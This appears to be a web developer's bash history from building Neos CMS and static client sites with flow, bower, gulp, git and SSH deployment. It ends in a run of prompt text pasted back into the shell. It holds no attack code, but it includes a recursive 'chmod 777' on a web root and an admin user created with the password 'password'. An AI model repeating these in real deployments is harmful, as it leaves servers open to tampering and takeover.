webappcreations.diessbacherbablDe:NewProject +ls +./flow node:repair --node-type webappcreations.diessbacherbablDe:NewProject +tail -20 /var/log/httpd/error_log +vim /etc/httpd/conf/extra/httpd-vhosts.conf +tail -20 /var/log/httpd/ +./flow node:repair --node-type webappcreations.diessbacherbablDe:Project" +./flow node:repair --node-type webappcreations.diessbacherbablDe:Project +./flow node:repair --node-type webappcreations.diessbacherbablDe:Project +./flow nodeindex:build && ./flow nodeindex:cleanup +./flow help nodeindex +./flow help node +./flow help index +./flow help +xbacklight -set 5 +ls +cat composer.json +ls +php composer.phar create-project neos/neos-base-distribution NeosFusionBP +ls +ls +git clonesion-bp . +git clonesion-bp Packages/Sites/ +git clonesion-bp Packages/Sites/fusion-bp-git +ls +ls composer.json +cat composer.json +cat README.md +ls +cp Packages/Sites/Flowpack.FusionBP/ .. +cp -r Packages/Sites/Flowpack.FusionBP/ .. +ls +vim /etc/httpd/conf/extra/httpd-vhosts.conf +ls +pwd +vim /etc/hosts +exit +history +sudo systemctl restart httpd.service +l +ls +ls +ls +ls +cat dead.letter +ls Neos +ls Neos31 +la Neos31 +sudo chown -R http:goalador . +sudo chmod -R 777 . +la +sudo chmod -R 776 . +la +sudo chmod -R 775 . +la +cat /srv/http/Neos/NeosFusionBP/Data/SetupPassword.txt +scrot ~/Pictures/NeosFusionBP.png +scrot ~/Pictures/NeosFusionBP2.png +cat /srv/http/Neos/NeosFusionBP/Data/SetupPassword.txt +./flow site:list +./flow site:import --package-key Flowpack.FusionBP +./flow site:create --name FusionBP --package-key Flowpack.FusionBP +ls +./flow help site:create +./flow site:kickstart Flowpack.FusionBP Flowpack.FusionBP +./flow package:create Flowpack.FusionBP +ls Packages/Application/Flowpack.FusionBP/ +mv Packages/Application/Flowpack.FusionBP/ Packages/Application/Flowpack.FusionBP_empty +./flow site:create Flowpack.FusionBP +ls +ls Flowpack.FusionBP/ +la Flowpack.FusionBP/ +la Flowpack.FusionBP/Configuration/ +./flow flow:cache:flush +./flow flow:cache:flush +./flow help +./flow site:import +./flow site:import Flowpack.FusionBP +ls +ls Packages/ +ls Packages/Sites/ +xbacklight -set 1 +grunt +xbacklight -set 5 +feh --bg-fill ~/Pictures/Wallpapers/andrew-furlan-195339_darker.jpg +npm -v +./flow nodeindex:build && ./flow nodeindex:cleanup +./flow nodeindex:build && ./flow nodeindex:cleanup +./flow flow:cache:flush + ./flow node:repair +vim /etc/hosts +vim /etc/hosts +ls +ls +cat composer. +cat composer.json +vim /etc/hosts +ls +ls +NeosIo/ +ls NeosIo/ +ls NeosIo/Packages/ +ls NeosIo/Packages/Sites/ +ls NeosIo/Packages/Sites/Neos.NeosIo/ +php composer.phar create-project neos/neos-base-distribution NeosDemo +vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/hosts +sudo systemctl restart httpd.service +sudo chmod -R 775 NeosDemo/ +sudo chown -R http:goalador NeosDemo/ +cat /srv/http/Neos/NeosDemo/Data/SetupPassword.txt +vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/hosts +sudo systemctl restart httpd.service +./flow node:migrate 20150716212459 +./flow node:migrate 20150716212459 + ./flow node:repair +./flow node:migrate 20150716212459 +./flow flow:cache:flush --force +./flow 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node:repair --node-type webappcreations.diesbacherbablDe:Footer +./flow node:repair --node-type Neos.NodeTypes:Footer +ls +cat Data/Logs/Exceptions/20170612193743bd6f94.txt +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair +cat /srv/http/Neos/Neos31/Data/SetupPassword.txt +./flow node:repair +./flow routing:list +grep -r ':Homepage' . +grep -r 'icon: 'icon-globe'' . +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair --node-type webappcreations.diesbacherbablDe:Home +./flow node:repair --node-type webappcreations.diessbacherbablDe:Home +./flow node:migrate 20150716212459 +./flow node:repair +./flow node:repair --node-type Neos.NodeTypes:Page +./flow routing:list +ls Data/Logs/System_Development.log +tail -200 Data/Logs/System_Development.log +./flow node:repair +./flow node:repair +./flow node:repair +./flow node:repair +./flow node:repair --node-type Neos.NodeTypes:Page +./flow node:repair --node-type webappcreations.diessbacherbablDe:Home +./flow node:repair --node-type webappcreations.diessbacherbablDe:Home +./flow node:repair --node-type webappcreations.diessbacherbablDe:Home +./flow node:repair +./flow flow:cache:flush --force +./flow node:repair +./flow flow:cache:flush --force +./flow node:repair +./flow node:repair +./flow node:repair +./flow node:repair +./flow flow:cache:flush --force +./flow node:repair --node-type webappcreations.diessbacherbablDe:ProjectDocument +./flow node:repair --node-type webappcreations.diessbacherbablDe:ProjectDocument +./flow node:repair --node-type webappcreations.diessbacherbablDe:ProjectDocument +./flow node:repair --node-type webappcreations.diessbacherbablDe:ProjectDocument +xbacklight -set 1 +./flow node:repair +cp -r Neos31 Neos31_backup_teaserNew +cp -r Neos31 /run/media/goalador/76CC-D761/Neos31_backup_teaserNew +./flow site:export +ls +ls +flow help site:export +./flow help site:export +./flow site:export --package-key webappcreations.diessbacherbablDe +ls Packages/Sites/webappcreations.diessbacherbablDe/Resources/Private/Content/ +./flow node:repair +./flow flow:cache:flush --force +./flow node:repair +.screenlayout/laptop.sh +grunt +ls +grunt +./flow site:export --package-key webappcreations.diessbacherbablDe +./flow site:export +.screenlayout/ulli.sh +~/.screenlayout/ulli.sh +~/.screenlayout/laptop.sh +~/.screenlayout/ulli.sh +~/.screenlayout/laptop.sh + ./flow node:repair + ./flow node:repair + ./flow node:repair + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsContent + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsContent + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsContent + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsListe + ./flow node:repair + ./flow node:repair + ./flow node:repair + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsListe + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsListe + ./flow node:repair --node-type webappcreations.diessbacherbablDe:PersonOneCollection + ./flow node:repair --node-type webappcreations.diessbacherbablDe:PersonOneCollection + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUns + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsContent + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsListe + ./flow node:repair + ./flow node:repair + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsListe + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsContent + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUns +./flow flow:cache:flush --force + ./flow node:repair --node-type webappcreations.diessbacherbablDe:UeberUnsListe + ./flow node:repair + ./flow node:repair +./flow flow:cache:flush --force + ./flow node:repair +./flow flow:cache:flush --force + ./flow node:repair +ssh +ssh diesbacher-babl.de +ssh diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ls +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +ls +cp js/main.js /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/JavaScript/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp bower_components/perfect-scrollbar/css/perfect-scrollbar.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +cp js/main.js /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/JavaScript/ +history +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +q +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +s +ls +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +./flow site:export --package-key webappcreations.diessbacherbablDe +ls +ls Packages/Sites/ +./flow site:list +cat Configuration/Settings.yaml +./flow workspace:list +./flow workspace:list +ls +ls +ls +pwd +ls +ls Content/ +ls +ls +ls +cat composer.json +cat Data/Logs/Exceptions/201707021139176a61a0.txt +ls +cat composer. +cat composer.json +./flow configuration:show --type Settings --path Neos.ContentRepository.contentDimensions +grunt +ls +ls +l +ls +cat createdb.sh +cat backup.sh +ls +rm -rf oxideshop_ce/ +sudo rm -rf oxideshop_ce/ +ls +ls +vim Configuration/Settings.yaml +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +alsamixer +grunt +cp js/main.js /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/JavaScript/ +cp js/main.js /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/JavaScript/ +mkdir Website +git clonestalkapp.com/gustav-c-kuehn.git +git clonestalkapp.com/gustav-c-kuehn.git +clear +ls +ls +ls app/ +ls dist/ +chromium dist/index.html +git status +git checkout -b bootstrap4 +s +ls +gulp +ls app/ +ls dist/ +ls package.json +cat package.json +yarn install +yarn add bootstrap@4.0.0-alpha.6 +cat package.json +ls +npm install +ls +npm install --save bootstrap@4.0.0-alpha.6 +npm install --save ionicons@2.0.1 +cat package.json +gulp +gulp +ls dist/ +gulp +gulp +gulp +gulp +npm install --save animate.css +ls node_modules/ +xbacklight -set 1 +ls +tail -200 Data/Logs/System_Development.log + ./flow node:repair +./flow flow:cache:flush --force +./flow cache:warmup +tail -200 Data/Logs/System_Development.log +tail -200 Data/Logs/System_Development.log +tail -200 Data/Logs/System_Development.log +tail -200 Data/Logs/System_Development.log +ssh ssh-454747-neos@diessbacher-babl.de +./flow flow:cache:flush --force +./flow cache:warmup# +cp js/main.js /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/JavaScript/ +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +git clonesitegeist/Workshop-AtomicFusion-2017-07-03 afx-workshop +composer install +./flow doctrine:migrate +vim Configuration/Settings.yaml +vim Packages/Sites/Sitegeist.Phoenix/Configuration/Settings.yaml +l +ls +ls +ls Configuration/ +vim Configuration/Settings.yaml +vim Packages/Sites/Sitegeist.Phoenix/Configuration/Settings.yaml +git status +git checkout -b localhost +vim Configuration/Settings.yaml +mysql -u root -p +./flow doctrine:migrate +ls +ls -all +cat composer.json +git status +vim Configuration/Settings.yaml +./flow doctrine:migrate +./flow doctrine:migrate +./flow flow:cache:flush --force +./flow doctrine:migrate +./flow doctrine:migrate +./flow site:import --package-key Sitegeist.Phoenix +./flow user:create --roles Administrator admin password Admin User +./flow server:run +scrot +~/.screenlayout/ulli.sh +~/.screenlayout/laptop.sh +ls +ls dist +ssh ssh-454747-neos@diessbacher-babl.de +grunt +ls +gulp +gulp watch +gulp +gulp +gulp +grunt +cp css/skeleton.css /srv/http/Neos/Neos31/Packages/Sites/webappcreations.diessbacherbablDe/Resources/Public/Styles/ +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ls +ls +ls +ls +ls +ls +ls +ls bower_components/ +bower install bootstrap@4.0.0-alpha.6 +ls +ls bower_components/ +ls bower_components/bootstrap/dist/css/ +bower install --save ionicons@2.0.1 +bower install ionicons@2.0.1 +ls +ls bower_components/ +bower install animate.css +ls +bower install wow.js +bower install scrollspy +bower install jquery-easing +ls bower_components/jquery-easing/ +cp -r gustav-c-kuehn-base/ gustav-c-kuehn-base-bak +bower install --save swiper.js +bower install --save swiper +bower init +vim bower.json +bower list +vim bower.json +bower list +vim bower.json +vim bower.json +bower list +vim bower.json +bower install --save jquery-easing +bower install --save scrollspy animate.css Ionicons +bower install --save ionicons@2.0.1 +bower install bootstrap@4.0.0-alpha.6 wow.js +cat bower.json +bower install --save bootstrap@4.0.0-alpha.6 wow.js +cat bower.json +bower install --save animate.css +cat bower.json +git status +ls +git status +geany .gitignore +git status +git add .gitignore +git status +git add .gitignore +ls +ls app/ +ls +ls +ls gustav-c-kuehn/app/ +ls gustav-c-kuehn-base-bak/app +ls gustav-c-kuehn-base-bak2/app +ls +cat bower.json +ls +ls bower_components/ +rm -rf bower_components/ +mv bower.json gustav-c-kuehn-base/ +git status +bower install --save swiper +cat bower.json +ls +ls app +ls app/bower_components/ +mv bower.json app/ +rm -rf bower_components/ +bower install --save swiper +ls bower +ls bower_components/ +ls +cp -r gustav-c-kuehn/ gustav-c-kuehn-base +ls -all +ls +ls node_modules/ +ls +ls app/ +geany app/index.html +geany app/index.html +gulp +gulp +gulp +gulp watch +gulp +gulp +gulp +gulp +gulp +gulp +gulp +gulp +gulp +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ssh ssh-454747-neos@diessbacher-babl.de +ls +git pull origin master +ls +cp -r gustav-c-kuehn-base gustav-c-kuehn-base-bak3 +git pull origin master +git pull origin master +git status +geany .gitignore +git status +git add .gitignore +git status +ls +convert Karte-Standort-Norderstedt.jpg Karte-Standort-Norderstedt-small.jpg +convert -quality 80 Karte-Standort-Norderstedt.jpg Karte-Standort-Norderstedt-small.jpg +sudo rm -rf Neos/Neos31_bak_swiper/ +sudo rm -rf diessbacher/ +pacman -Qdt +xdg-settings set default-web-browser chromium.desktop +echo $BROWSER +geany ~/.config/mimeapps.list +git status +git add . +git status +git commit -m 'basic layout without the new images' +git checkout master +git merge bootstrap4 +git status +git status +git add . +git status +git commit -m 'adding correct images and starting with simpler hover effect on hover-menu' +git push origin master +git status +git pull origin master +git status +gulp +ping google.de +ping google.de +cat bower.json +cat /usr/lib/modules +/usr/lib/modules +mkinitcpio -L +mkinitcpio +gulp +gulp +gulp +gulp +ls /etc/mkinitcpio.d +sudo mkinitcpio -p linux44 +~/.screenlayout/ulli.sh +clear +mkdir medium-neos-impress +git cloness/impress.js.git medium-neos-impress/ +ls +chromium index.html +ls -hal +~/.screenlayout/ulli.sh +clear +lap +~/.screenlayout/laptop.sh +bluetoothctl +ssh ssh-301407-robin@gustav-c-kuehn.de +s +ssh ssh-301407-robin@gustav-c-kuehn.de +ssh ssh-301407-robin@gustav-c-kuehn.de +ssh ssh-301407-robin@gustav-c-kuehn.de +ssh ssh-301407-robin@gustav-c-kuehn.de +bluetoothctl +mv main.js .. +exit +du -h /run/media/goalador/TOSHIBA +ls +gulp +gulp +git pull +ls +cp -r gustav-c-kuehn-base-bak4 +cp -r gustav-c-kuehn-base gustav-c-kuehn-base-bak4 +ls +ls +ls +ls +df -h . +du -h . +du -h img/ +ls +git status +git add . +git commit -m 'fixing the default gulp task' +gulp +git status +git add . +git commit -m 'fixing the sliderarrow and always showing the images first on mobile & minor bugfixes' +git pull +git status +git push +gulp +gulp +git status +git add . +git commit -m 'fixing image-menu, keeping the proper mobile-width and the text centered' +git pull +git push +gulp +ls -all +git status +git pull origin develop +gulp +git status +git pull +gulp +gulp +git status +git add . +git commit -m 'smaller bugfixes (eg. ie11 and Safari9), changing text-image order on gewerbehallen, adding h3 for Slider, setting font-color to 80% black, slider-navi should work with many items on mobile too now' +git push +gulp stage +git status +git add . +git status +git add . +git status +git add . +git status +git commit -m 'refreshing dist folder with newest bug fixes and adding content for the robots.prod.txt' +git push +git status +git pull +git pull +gulp +git status +git stage +git add . +git stage +gulp stage +git add . +git status +git commit -m 'adding google map, including js to open it. Needs better centering, playing around with an own icon and a label text' +git push +git status +git add . +#git commit -m 'map doesn't work on stage ' +gulp stage +git commit -m 'map doesn't work on stage yet, this might not help, last try for today, should work locally' +git commit -m 'map doesnt work on stage yet, this might not help, last try for today, should work locally' +git push +ls +git status +git pull +gulp +npm install +ls +ls -all +git branch --list +#git checkout -b devel +ls app/bower_components/ +cat app/bower.json +bower install -save scrollspy +cat app/bower.json +bower install --save scrollspy +ls +rm -rf bower_components/ +ls +bower install --save scrollspy +bower install --save tether +cat bower.json +git status +git add . +git commit -m 'adding all dependencies to bower and integrating border-bottom on textlinks.' +git status +git push +git checkout -b develop +git status +gulp stage +git starus +git status +git add . +git status +git commit -m 'new stage-dist including textlinks' +git push +git push --set-upstream origin develop +git push origin develop +ls +find . -name '*.jpg' | while read f; do convert "$f" -limit memory 16mb -limit map 32mb -geometry x1000 -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing image: $f file..."; done +find . -name '*.jpg' | while read f; do convert "$f" -limit memory 16mb -limit map 32mb -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing image: $f file..."; done +cp -rf gustav-c-kuehn-base/app/img/ gustav-c-kuehn-base-bak4/app/ +ls +ls +ls -hal +find . -name '*.jpg' | while read f; do convert "$f" -limit memory 16mb -limit map 32mb -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing image: $f file..."; done +ls -hal +find . -name '*.png' | while read f; do convert "$f" -limit memory 16mb -limit map 32mb -sampling-factor 4:2:0 -strip -quality 85% "$f"; echo "Processing image: $f file..."; done +ls -hal +ls +git status +ls +ls +git pull origin master +git clonestalkapp.com/gustav-c-kuehn gustav-c-kuehn-master +ls +ls +ls node_modules/ +npm install --save-dev gulp-rev +gulp build +ls dist +pwd +gulp build +gulp build +gulp build +gulp build +ls +npm install --save-dev gulp-rev-replace +gulp build +gulp build +ls +ls css +gulp build +ls +ls css +head index-02f0ad4b59-02f0ad4b59.html +head index-02f0ad4b59-02f0ad4b59.html -100 +head index-02f0ad4b59-02f0ad4b59.html - 100 +head index-02f0ad4b59-02f0ad4b59.html 100 +gulp build +ls -all +cat .gitignore +git status +geany .gitignore +git status +git add . +git commit -m 'improving the mobile-menu and the mobile arrows for the slider. adding gulp rev and preparing the dist-folder for deployment' +git status +git push +git pull +git status +git status +ls +ls dist/ +git pull +ls +ls app +git push +ls +ls -all +cat .htaccess_stage +ls +ls all +ls -all +touch robots.stage.txt +touch robots.prod.txt +geany robots.stage.txt +gulp stage +ls dist/ +ls -all dist/ +git status +git add . +git commit -m 'adding gulp stage as a task to copy the stage files: robots.stage.txt and htaccess_stage to dist. repairing the desktop menu to get the active state back.' +git push +ls dist +git status +ls +gulp stage +ls dist +ls dist -all +git status +geany .gitignore +ls dist/ +git status +touch dist/test.txt +git status +git rm dist/test.txt +ls dist +git status +ls +rm test.txt +ls +git status +ls +npm install --save-dev gulp-rename +gulp stage +ls dist +rm -rf dist/* +ls -all dist/ +rm -rf dist/.htaccess/ +gulp stage +ls dist +cat dist/robots.txt +ls -hall dist/ +git status +git add . +git commit -m 'fixing issues with gulp rename' +git status +git push +ls +git init +git add . +git commit -m 'initialinzing git' +bower init +ls +bower install --save bulma +bower install --save font-awesome +ls bower_components/bulma/css/bulma.css +ls bower_components/font-awesome/css/font-awesome.min.css +git add . +git commit -m 'adding bower bulma and font-awesome' +ls bower_components/bulma/css/bulma.css +du -h bower_components/bulma/css/bulma.css +cp demo/ themes-scrollmagic +cp -r demo/ themes-scrollmagic +bower install --save scrollmagic +ls +cat bower +cat bower.json +bower install --save jquery +bower install --save greensock +bluetoothctl +bluetoothctl +bluetoothctl +bluetoothctl +bluetoothctl +bluetoothctl +cp -r fullImpress fullImpress-bak-integration-of-4stepMenu +~/.screenlayout/laptop.sh +bluetoothctl +exit +convert Responsive\ Website\ Templates\ For\ Duda\'s\ Website\ Builder.png Responsive\ Website\ Templates\ For\ Duda\'s\ Website\ Builder.jpg +cp -r demo/ hhneuauf.de +ls +geany index.html styles.css +bluetoothctl +gul +gulp +git pull +gulp +gulp stage +git status +git add . +git commit -m 'Google Maps - centering the Map, adding Marker, Infobox and Routes-planer-link' +git push +gulp +gulp stage +gulp stage +gulp +gulp +gulp stage +gulp +gulp stage +gulp +git pull +git status +git checkout -- app/css/styles.css +git checkout -- app/scss/styles.css +git checkout -- app/scss/styles.scss +git status +git pull +gulp +git stage +gulp stage +git add . +git commit -m 'final mobile menu fixes' +git push +git pull +ls +ls +ls dist/ +git status +git add . +git commit -m 'separate google-map script' +git push +git status +git add . +git commit -m 'making h4 headline bright-green, adding favicon, fixing pdf-link, headline borderTop opactiy 100%, adding hover-state to navigation' +git status +git add . +git commit -m 'calculating the Slider-Arrow-Positions on Mobile with JS. Fixing Standort text position on mobile.' +gulp stag +gulp stage +gulp stage +gulp stage +gulp stage +gulp stage +gulp stage +gulp stage +gulp stage +gulp stage +git add . +git commit -m 'always position the headerimage and its headline to the bottom of the screen' +git push +git status +gulp stage +git add . +git commit -m 'removing placeholder access errors' +git push +gulp stage +git add . +git commit -m 'removing placeholder access errors 2' +git push +git push +gulp stage +git add . +git commit -m 'Gewerbehallen - on mobile always show the image first in the Slider' +git push +gulp stage +git add . +git commit -m 'fixes for iPad (Mobile menu starts on less than 990px, making sure Slider-arrows are always centered. Cleaning up the styles.css)' +git push +git pull +git pull +gulp stage +git add . +git commit -m 'correcting the window-width getter function' +git push +gulp stage +git add . +git commit -m 'setting the window-width a little lower' +git push +gulp stage +gulp stage +git add . +git commit -m 'setting lower image-size for lower screen-sizes before going into mobile view' +git push +~/.screenlayout/ulli.sh +git pull +git pull +git stage +git add . +gulp stage +git add . +git status +git commit -m 'removing Google Maps Overlay, fixing I Pad Logo...' +git status +git push +gulp stage +git status +git add app/css/styles.css +git status +git add . +git commit -m 'finally fixing Menu on iPad?' +git push +git stage +gulp stage +git add . +git commit -m 'fixing iPad Logo position by setting a specific SVG-Width.' +git push +bluetoothctl +~/.screenlayout/ulli.sh +~/.screenlayout/laptop.sh +bluetoothctl +bluetoothctl +bluetoothctl +bluetoothctl +bluetoothctl +bluetoothctl +mkdir interone +git clone git@git.interone.de:interone-hamburg/dp-s.git +bower install --save jquery +ls bower_components/jquery/dist/h +hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ +hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: hhneuauf.de]$: command not found +[goalad[goalador@gatanda hhneuauf.de]$ [goalador@gatanda h>[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatan]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bcommandgoalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalad[goalador@gatanda hhneuauf.de]$ [goalador@gatanda h>[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalad[goalador@gatanda: command not foundgatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalad[goalador@gatanda hhneuauf.de]$ [goalador@gatanda h>[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalad[goalador@gatanda: command not foundbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ gatanda hhneuauf.de]$ +bash: gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ gatanda hhneuauf.de]$ +bash: gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalad[goalador@gatanda hhneuauf.de]$ [goalador@gatanda h>[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalad[goalador@gatanda: command not foundgatanda hhneuauf.de]$ +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command: command not found 